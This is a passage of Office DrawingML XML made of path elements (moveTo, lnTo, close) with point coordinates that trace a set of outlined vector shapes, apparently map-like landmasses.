                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10704" y="2251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10781" y="2246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10861" y="2227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10925" y="2198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10918" y="2146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10960" y="2136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11074" y="2067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11113" y="2027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11032" y="1981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11034" y="1976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11180" y="1991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11214" y="1981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11160" y="1951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11164" y="1912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11192" y="1905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11347" y="1875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11369" y="1836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11297" y="1783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11132" y="1739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11216" y="1741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11334" y="1724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11281" y="1653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11238" y="1616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11127" y="1614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11007" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10911" y="1601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787" y="1545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787" y="1505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10721" y="1470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10649" y="1375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10596" y="1316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10556" y="1286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10606" y="1202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10554" y="1185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10436" y="1177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10317" y="1135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10448" y="1145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10505" y="1140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10521" y="1094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10505" y="1040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10418" y="1022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10362" y="1037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10330" y="1052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10266" y="1087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10258" y="1027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10273" y="991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10367" y="954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10415" y="865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10359" y="845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10371" y="791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10245" y="741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10213" y="685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10157" y="651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9977" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9889" y="554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9785" y="539"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11399" y="539"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11408" y="559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11485" y="599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11583" y="662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11391" y="596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11286" y="572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11248" y="613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11286" y="675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11315" y="694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11414" y="732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11483" y="778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11460" y="815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11359" y="813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11256" y="741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11165" y="707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11019" y="779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10990" y="826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11106" y="835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11199" y="906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11307" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11453" y="993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11318" y="1017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11359" y="1094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11404" y="1133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11539" y="1182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11578" y="1242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11696" y="1242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11684" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11739" y="1331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11834" y="1399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11908" y="1379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12032" y="1384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11982" y="1432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12000" y="1540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12155" y="1545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12263" y="1500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12253" y="1560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12165" y="1597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12310" y="1621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12394" y="1609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12510" y="1562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12586" y="1486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12510" y="1456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12606" y="1448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12591" y="1407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12512" y="1363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12413" y="1301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12212" y="1220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12093" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12044" y="1214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12015" y="1178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11963" y="1161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11928" y="1103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11982" y="1092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11866" y="1042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11781" y="988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11770" y="961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11766" y="927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11899" y="877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11946" y="850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11935" y="823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12098" y="845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12239" y="875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12328" y="843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12281" y="810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12047" y="771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12036" y="788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11941" y="739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11839" y="690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11877" y="678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11793" y="636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11626" y="582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11399" y="539"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12579" y="712"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12517" y="729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12527" y="746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12559" y="754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12608" y="747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12616" y="746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12611" y="725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12579" y="712"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12699" y="813"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12685" y="823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12793" y="855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12884" y="852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12884" y="833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12828" y="815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12699" y="813"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12495" y="826"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12532" y="858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12593" y="870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12571" y="897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12636" y="939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12692" y="983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12716" y="1010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="1013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12746" y="1042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12790" y="1064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12882" y="1023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12951" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13054" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12945" y="954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12961" y="919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12815" y="907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12704" y="911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12690" y="875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12584" y="828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12495" y="826"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13670" y="897"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13715" y="948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13741" y="946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13726" y="912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13788" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13784" y="897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13670" y="897"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12000" y="958"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11940" y="970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11926" y="978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11908" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11948" y="1037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12015" y="1040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12073" y="1008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12081" y="971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12000" y="958"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8159" y="1313"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7969" y="1369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7987" y="1318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7772" y="1409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7672" y="1456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7639" y="1495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7546" y="1631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7566" y="1705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7713" y="1680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7778" y="1709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7876" y="1650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7905" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8007" y="1537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8036" y="1461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8203" y="1438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8278" y="1382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8255" y="1331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8100" y="1390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8066" y="1380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8159" y="1313"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11746" y="1387"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11736" y="1411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11797" y="1476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11904" y="1513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11931" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11956" y="1486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11935" y="1427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11923" y="1419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11857" y="1416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11802" y="1402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11746" y="1387"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13098" y="1500"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13091" y="1539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13086" y="1557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13099" y="1582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13123" y="1628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13205" y="1624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13285" y="1634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13264" y="1572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13209" y="1554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13167" y="1500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13098" y="1500"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11852" y="1591"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11807" y="1606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11791" y="1645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11813" y="1690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11879" y="1715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11972" y="1735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12056" y="1741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12111" y="1769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12162" y="1794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12167" y="1823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12190" y="1860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12147" y="1885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12148" y="1926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12219" y="1958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12226" y="2001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12290" y="2042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12347" y="2018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12340" y="1975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12278" y="1929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12283" y="1877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12328" y="1838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12367" y="1791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12285" y="1719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12224" y="1682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12130" y="1650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11987" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11936" y="1591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11852" y="1591"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12729" y="1636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12604" y="1661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12530" y="1650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12377" y="1683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12440" y="1737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12525" y="1781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12596" y="1784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12663" y="1767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12717" y="1735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12780" y="1665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12729" y="1636"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12886" y="1673"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12780" y="1724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12800" y="1786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12707" y="1794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12687" y="1820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12775" y="1852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12800" y="1894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12904" y="1894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12936" y="1828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13007" y="1889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13046" y="1872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13029" y="1762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13040" y="1724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13005" y="1693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12886" y="1673"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13328" y="1683"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13273" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13301" y="1778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13317" y="1853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13241" y="1895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13143" y="1961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13135" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13150" y="2049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13202" y="2067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13311" y="2000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13387" y="1996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13286" y="2064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13274" y="2106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13386" y="2119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13362" y="2182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13480" y="2242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13396" y="2242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13399" y="2281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13571" y="2348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13653" y="2362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13793" y="2373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13779" y="2304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13726" y="2249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13862" y="2323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13901" y="2296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13855" y="2242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13768" y="2166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13729" y="2091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13803" y="2131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13848" y="2185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13929" y="2239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13968" y="2261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14040" y="2197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13990" y="2165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13976" y="2104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14022" y="2072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13956" y="2022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13803" y="1916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13673" y="1860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13611" y="1823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13564" y="1754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13493" y="1688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13433" y="1693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13419" y="1730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13328" y="1683"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11759" y="1724"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11613" y="1751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11600" y="1774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11670" y="1788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11662" y="1810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11589" y="1825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11549" y="1857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11477" y="1872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11425" y="1899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11428" y="1954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11396" y="1968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11436" y="1990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11329" y="1981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11298" y="1998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11224" y="2005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11143" y="2086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11086" y="2111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11005" y="2171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11066" y="2176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11036" y="2198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10968" y="2217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10901" y="2264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10898" y="2294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10940" y="2328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10987" y="2345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11046" y="2360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11091" y="2372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11137" y="2387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11207" y="2378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11212" y="2394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11281" y="2404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11327" y="2402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11366" y="2392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11421" y="2341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11425" y="2378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11448" y="2392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11512" y="2365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11571" y="2367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11600" y="2373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11652" y="2370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11679" y="2336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11679" y="2296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11696" y="2251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11679" y="2200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11576" y="2173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11519" y="2143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11591" y="2119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11606" y="2138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11682" y="2168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11712" y="2116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11701" y="2064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11738" y="2035"/>
                </a:lnTo>
                <a:lnTo>
